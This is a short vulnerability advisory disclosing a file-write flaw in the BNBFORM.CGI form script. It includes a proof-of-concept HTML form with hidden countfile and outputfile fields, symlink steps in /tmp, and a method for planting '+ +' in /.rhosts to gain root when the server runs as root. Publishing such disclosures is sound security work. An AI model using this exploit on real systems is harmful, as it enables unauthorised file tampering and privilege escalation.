suid@suid.kg - mini advisory - BNBFORM.CGI Software: BNBFORM.CGI Vendor: BigNoseBird.com URL: http://bignosebird.com/carchive/bnbform.shtml Version: Version 4.0 Platforms: Unix, Windows NT Type: Input validation problem Summary: Any local user can create / append to / truncate any file owned by the web server user (nobody/apache/whatever). Vulnerability: Building a HTML form resembling: <form method=post action=/cgi-bin/bnbform.cgi> <input type=hidden name=blah value=blah> <input type=hidden name=required value=blah> <input type=hidden name=data_order value=blah> <!-- To truncate a file --> <input type=hidden name=countfile value="/tmp/whatever"> <!-- To append to a file --> <input type=hidden name=outputfile value="/tmp/whatever"> <input type=submit> </form> In the /tmp directory as a local user, create a symbolic link to either /tmp/whatever.bcnt for the countfile/truncate version, or /tmp/whatever.bout for the outputfile/append version. If httpd is running with UID == 0, you could potentially get root if the system honours /.rhosts by setting the value of blah to "+ +\n". Then symlink'ing /tmp/whatever.bout -> /.rhosts Example: <input type=hidden name=blah value="+ + "> Of course you could simply send this in a POST request directly to the web server. Whatever. Ok. Have a good one. http://www.suid.edu/advisories/004.txt EOF